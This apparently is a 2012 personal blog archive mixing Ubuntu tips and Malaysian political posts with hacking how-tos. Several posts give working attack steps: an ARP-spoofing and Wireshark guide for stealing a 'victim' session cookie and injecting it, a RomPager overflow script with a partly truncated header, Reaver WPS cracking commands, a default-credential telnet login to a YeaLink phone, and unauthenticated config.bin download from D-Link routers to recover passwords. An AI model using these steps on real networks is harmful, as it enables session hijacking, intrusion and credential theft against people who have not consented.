Posts

Showing posts from 2012

YeaLink IP Phone SIP CSRF / Default Credentials

:~# telnet 10.10.1.136 Trying 10.10.1.136... telnet: Unable to connect to remote host: Connection refused :~# CSRF Code :~# telnet 10.10.1.136 Trying 10.10.1.136... Connected to 10.10.1.136. Escape character is '^]'. IPPHONE login: Password: BusyBox v1.6.1 (2010-10-08 16:43:22 CST) Built-in shell (ash) Enter 'help' for a list of built-in commands. $

Skype Webcam Fail on Ubuntu (Solution)

Just for my record only. Need to install both :- libv4l-0 - Collection of video4linux support libraries libv4l-dev - Collection of video4linux support libraries (development files) #apt-get install libv4l-0 #apt-get install libv4l-dev ===EOF===

RomPager Exploit.

# ./get.pl -n 17x.x.x.x [+] GET Http By Pretorians [!] Target: 17x.x.x.x Connecting to 17x.x.x.x HTTP/1.1 404 Not Found Content-Type: text/html Server: RomPager/4.07 UPnP/1.0 #ruby rugbi.rb End Result =========== ./get.pl -n 17x.x.x.x [+] GET Http By Pretorians [!] Target: 17x.x.x.x |!| Can not connect... ===EOF=== Code -------- require 'net/https' url = URI.parse("http://17x.x.x.x/") data = nil headers = {   "Host" => "IP",   "Authorization" => "Basic AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$ } res = Net::HTTP.start(url.host, url.port) do |http|   http.use_ssl = false   http.send_request("GET", url.path, data, headers) end puts res.body

GET HTTP(Proxy / IO:Socket / HTML::LinkExtor)

Latest update was HTML::LinkExtor as below. #!/usr/bin/perl ############################################ #           [+]  Get HTTP #       Created #              BY #                Pretorians # ########################################### use LWP::Simple; use Time::localtime; use LWP::UserAgent; use  IO::Socket; use HTML::LinkExtor; ## print "[+] GET Http By Pretorians \n"; ## ## if (@ARGV == 0) {&usg;} while (@ARGV > 0) { $type = shift(@ARGV); $t = shift(@ARGV); if ($type eq "-p") { print "[!] Target: $t\n"; my $ua = LWP::UserAgent->new;      $ua->agent('Mozilla/5.0 ');        $ua->proxy([(http )] => 'socks://127.0.0.1:9050');         $ua->cookie_jar({}...

GET HTTP (Proxy or using IO::Socket)

#!/usr/bin/perl ############################################ #           [+]  Get HTTP #       Created #              BY #                Pretorians # ########################################### use LWP::Simple; use Time::localtime; use LWP::UserAgent; use  IO::Socket; ## print "[+] GET Http \n"; ## ## if (@ARGV == 0) {&usg;} while (@ARGV > 0) { $type = shift(@ARGV); $t = shift(@ARGV); if ($type eq "-p") { print "[!] Target: $t\n"; my $ua = LWP::UserAgent->new;      $ua->agent('Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0');        $ua->proxy([(http )] => 'socks://127.0.0.1:9050');         $ua->cookie_...

GET HTTP with Simplified Option(proxy / non-proxy)

#!/usr/bin/perl ############################################ #           [+]  Get HTTP #       Created #              BY #                Pretorians # ########################################### use LWP::Simple; use Time::localtime; use LWP::UserAgent; ## print "[+] GET Http Modem\n"; ## sub timestamp {   my $c = localtime;   return sprintf( "%04d-%02d-%02d_%02d-%02d-%02d",                   $c->year + 1900, $c->mon + 1, $c->mday,                   $c->hour, $c->min, $c->sec ); } print '[+] Date: [' . timestamp() . ']'. "\n"; ## ## if (@ARGV == 0) {&usg;} while (@ARGV...

GET HTTP ( LWP with TOR )

#!/usr/bin/perl use LWP::Simple; use Time::localtime; use LWP::UserAgent; ## print "[+] GET Http Modem\n"; ## sub timestamp {   my $c = localtime;   return sprintf( "%04d-%02d-%02d_%02d-%02d-%02d",                   $c->year + 1900, $c->mon + 1, $c->mday,                   $c->hour, $c->min, $c->sec ); } print '[+] Date: [' . timestamp() . ']'. "\n"; ## ## if (@ARGV == 0) {&usg;} $t = shift(@ARGV); { print "[!] Target: $t\n"; } ## ## ## my $ua = LWP::UserAgent->new;      $ua->agent('Mozilla/5.0');        $ua->proxy([(http )] => 'socks://127.0.0.1:9050');         $ua->cookie_jar({});       my $r = $ua->get("http://$t/") or die ("Unable to get page!"); print $r-...

GET HTTP (LWP:Simple/Time:LocalTime)

#!/usr/bin/perl use LWP::Simple; use Time::localtime; print "[+] GET Http Modem\n"; ## sub timestamp {   my $c = localtime;   return sprintf( "%04d-%02d-%02d_%02d-%02d-%02d",                   $c->year + 1900, $c->mon + 1, $c->mday,                   $c->hour, $c->min, $c->sec ); } print '[+] Date: [' . timestamp() . ']'. "\n"; ## ## if (@ARGV == 0) {&usg;} $t = shift(@ARGV); { print "[!] Target: $t\n"; my $r = getprint("http://$t/") or die ("Unable to get page!"); ## ## } sub usg(){ print "[!] usg: perl get.pl  \n"; } exit ;

GET HTTP (IO::Socket)

#!/usr/bin/perl use IO::Socket; my $url = 'www.google.com'; my $socket = IO::Socket::INET->new( Proto => 'tcp', PeerAddr => $url, PeerPort => 80) || die "|!| Can not connect...\n"; print "connecting to $url\n"; print $socket "GET $url HTTP/1.0\n\n"; $socket->recv(my $data, 1024); print "$data \n"; close ($socket); Credit to BufferCode

How to Update Java Plugin

Taken from java.com website. Enable and Configure Firefox or Mozilla To configure the Java Plugin follow these steps: Exit Firefox browser if it is already running. Uninstall any previous installations of Java Plugin. Only one Java Plugin can be used at a time. When you want to use a different plugin, or version of a plugin, remove the symbolic links to any other versions and create a fresh symbolic link to the new one. Create a symbolic link to the libnpjp2.so file in the browser plugins directory Go to the plugins sub-directory under the Firefox installation directory cd < Firefox installation directory > /plugins Create the symbolic link ln -s < Java installation directory > /lib/i386/libnpjp2.so Note : If you are upgrading your Java version then before creating new symbolic link you should remove old symbolic link to enable latest downloaded Java. To remove old symbolic link : type cd < Firefox installation directory > /plugins rm...

Uniscan Web vulnerability scanner

I recently install Uniscan for a web vulnerability scanner.Below is the step to install Uniscan. Requirements: Perl v5.12.3 or later installed on the operating system where the uniscan runs. you need the following perl modules: Moose threads threads::shared Thread::Queue HTTP::Response HTTP::Request LWP::UserAgent Net::SSLeay Getopt::Std To install this modules you need use command cpan -i . Example: # cpan -i Moose # cpan -i threads # cpan -i threads::shared # cpan -i Thread::Queue # cpan -i HTTP::Response # cpan -i HTTP::Request # cpan -i LWP::UserAgent # cpan -i Net::SSLeay # cpan -i Getopt::Std   How to use the uniscan: The uniscan must be run from the command line. Example:  perl uniscan.pl -u http://www.example.com/ -d OPTIONS: -h help -u example: https://www.example.com/ -f list of url's -b Uniscan go to background -q Enable Directory checks -w Enable File checks ...

CookieInjector using Greasemonkey

Tools -------- 1.Arpspoof 2.Mozilla Browser :) 3.Greasemonkey Addon ;) 4. CookieInjector Script >:) 5.Wireshark How to Used CookieInjector with Greasemonkey. ============================== 1)Turning on Port Forwarding $ sudo echo 1 >> /proc/sys/net/ipv4/ip_forward 2)Arpspoof from Gateway towards Victim $ sudo arpspoof -i wlan0 -t (Victim ip) (Default gateway) 3)Arpspoof from (Victim) towards (Default Gateway) $ sudo arpspoof -i wlan0 -t (Default gateway) (Victim ip) 4.Fire Up Wireshark and sniff on Wlan0 #wireshark 5.Put in Filter Expression  in Wireshark    http.cookie contains datr 6.Copy the cookie with "GET" label    right click--copy--Bytes--Printable Byte Only 7. Hit ALT -C to bring up CookieInjector Script and paste the cookie that being copied. 8.Click Yes and It will overwrite cookies files 9.That is Victim Page.. -=EOS=-

Satu Tema Kemerdekaan Bagi Semua Negeri Pakatan Rakyat

Image
My Heart will always be with PAKATAN RAKYAT!        Salam Merdeka Dari Pretorians!

List of Free DNS.

OpenDNS ====== 208.67.222.222 208.67.220.220 Google ===== 8.8.8.8 8.8.4.4

My Library Support Internet Blackout Day !!

Image
114A Evidence Act – The End of Internet Freedom in MALAYSIA? Hi to All Malaysia, I Pretorians fully supported stop114a campaign setup by CIJ_Malaysia! The video self-explain why I supported this campaign.   Internet users are held liable for any content posted through their registered networks or data processing device, is both unfair and an attempt to put fear in people. The amended law will have serious repercussions on Internet use as the owner of the site or device is presumed guilty and has to fight to prove his innocence. For more information kindly go to www.stop114a.wordpress.com or Facebook at https://www.facebook.com/evidenceamendmentact. template joomla

How to install Reaver-wps in Ubuntu 11.10?

1. wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz 2. tar xvf reaver-1.4.tar.gz 3. cd reaver-1.4/ 4. ./configure 5. IF got error (error: pcap library not found!)*Move to step 6. 6. apt-get install libsqlite3-dev libpcap0.8-dev build-essential 7. make 8. make install 9. EOF # * To Run Reaver ========= Open two terminal ----------------------- #aireplay-ng wlan0 -1 120 -a 00:01:02:03:04:05 -e cc:2e:13:fc:34:65 #reaver -i wlan0 -A -b 00:01:02:03:04:05 -v -d 1 -x 30 -l 600

How to install TOR in Ubuntu.

I always forgot on how to install TOR.It nothing new.Just for my library archive. Do not use the packages in Ubuntu's universe. They are unmaintained and out of date. That means you'll be missing stability and security fixes. You'll need to set up our package repository before you can fetch Tor. First, you need to figure out the name of your distribution. Here's a quick mapping: Ubuntu 11.04 is "natty" Ubuntu 10.10 or Trisquel 4.5 is "maverick" Ubuntu 10.04 or Trisquel 4.0 is "lucid" Ubuntu 9.10 or Trisquel 3.5 is "karmic" Ubuntu 9.04 is "jaunty" Ubuntu 8.10 is "intrepid" Ubuntu 8.04 is "hardy" Debian Etch is "etch" Debian Lenny is "lenny" Then add this line to your /etc/apt/sources.list file: deb http://deb.torproject.org/torproject.org main where you substitute the above word (etch, lenny, sid, karmic, jaunty, intrepid, hardy) in place of . Then add the...

How to Setup and Configure Metasploit-4.4.0

Go and download the latest version at Metasploit 4.4.0 open your terminal and find the install that you save and type chmod +x metasploit-latest-linux-installer.run to make the file executable. then you type it ./metasploit-latest-linux-installer.run and ENTER. setup it and depend on which directory you prefer to put.As a default it will put inside opt/metasploit-4.4.0/ After finish installing you can register it or you may run in inside the terminal.Its all depends on you guys. How to Update ============== root@Blog:/usr/local/bin# chmod +x msfupdate root@Blog:/usr/local/bin# ./msfupdate [*] [*] Attempting to update the Metasploit Framework... [*] Updating '.': Updated to revision 15655. ps: This installation guide i do it myself after my OS crash.I do a fresh installation of this Metasploit-4.4.0 inside my box.You may refer to Metasploit Blog if you got any question or doubt.If my guide may or can crash you box..im not responsible of it :)

How to Get Wifi Signal Strength Indication

In Percentage while [ 1 ];do clear;a=$(/sbin/iwconfig wlan0 | grep "Link Quality" | awk '{print $2}' | sed 's/.*\=//'); echo $(($((${a%/*} * 100)) / ${a#*/}))%;sleep 1;done In Normal way iwconfig wlan0 | grep "Link Quality"

D-Link (DIR-615) Vulnerability .How to?

Prerequisites : 1. A DIR-615 G1/G2 router with firmware 7.05x 2. A network connection to the router (Private)http://192.168.1.1 or (Public)http://123.456.46.16. 3. RouterPassView - This is the main tool here which performs the decryption/decompression of the router configuration file. Download it here : RouterPassView Software How To.(Steps) ============= 1. Visit your router's web configuration address. By default its either http://192.168.1.1 or http://192.168.0.1 or http://123.456.46.16 . 2. Once you can see the login page (you do not have to be logged in), append '/config.bin' to the back of the URL and visit that page (example : http://192.168.1.1/config.bin). 3. A file download for 'config.bin' should begin. Save the file to your computer. 4. Run RouterPassView. 5. Open the downloaded 'config.bin' in RouterPassView.. you should be able to see a table with some valid values. 6. And THAT IS YOUR Key for the padlock!!!

Make your DNS Static/Permanent in Ubuntu 11.04.How to?

Easier way out would be to edit /etc/resolv.conf and add your DNS records like this: nameserver 8.8.8.8 nameserver 8.8.4.4 Then run sudo chattr +i /etc/resolv.conf to stop NetworkManager from overwriting the file. To normalize back so that the dhcp can overwrite the name server you need to type sudo chattr -i /etc/resolv.conf

CCTV NetSurveillance Active X Control-Solution

1. Download and install dvrcenter.com/ocx/Active.exe 2. Goto C:\Windows and create directory 'NetSurveillance' 3. Download NetSurveillance.zip from the following link and extract contents to C:\Windows\NetSurveillance ( NetSurveillance.zip ) 4. Run 'install.bat' with administrator priviledges 5. Navigate to the IP or Dyndns name to remote access your DVR 6. Allow access to run Active X Controls 7. Log in to your DVR!! NB: Active X controls may need to changed via Internet Explorer to allow IE to prompt you. SImply change the appropriate active X settings in IE ->Internet Option->Security->Custom Level to either enable or prompt. Credit to kryptic00

Dont Forget..Make Sure You ALL COME n JOIN!!

Image

BERSIH 3.0-DUDUK BANTAH !!

Image

How to check 3G modem RSSI Signal Quality

I used minicom and set it to 9600 baud rate and also must set the serial device to tty/USB on which your USB detected. Below is the details. ===================== Signal quality Command: AT+CSQ Response: +CSQ: , Description: Returns signal quality. Received Signal Strength Indicator 0 -113 dBm or less 1 -111 dBm 2 to 30 -109 to -53 dBm 31 -51 dBm or greater 99 not known or not detectable Bit Error Rate, in percent 0..7. 99 not known or not detectable A note on the RSSI (received signal strength), dBm is a decibel (logarithmic) scale with a reference of 1 milliwatt thus 0 dBm equals a received signal of 1 mW. Signal strength is usually lower than 1 mW and therefore below 0, so the larger (closer to 0) the better signal strength. You can convert the RSSI to dBM with dBm = (rssi \times 2) - 113 Example >AT+CSQ=? +CSQ: (0-31,99),(99) OK >AT+CSQ +CSQ: 14,99 Courtesy of Shapeshifter

Social Engineer Toolkit (SET) Intergration with Metasploit 4.4.0

Download your copy of SET at below link. svn co http://svn.trustedsec.com/social_engineering_toolkit set/ Computer Based Social Engineering Tools: Social Engineer Toolkit (SET) The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test. 1 Beginning with the Social Engineer Toolkit 2 SET’s Menu 3 Attack Vectors 3.1 Spear-Phishing Attack Vector 3.2 Java Applet Attack Vector 3.3 Metasploit Browser Exploit Method 3.4 Credential Harvester Attack Method 3.5 Tabnabbing Attac...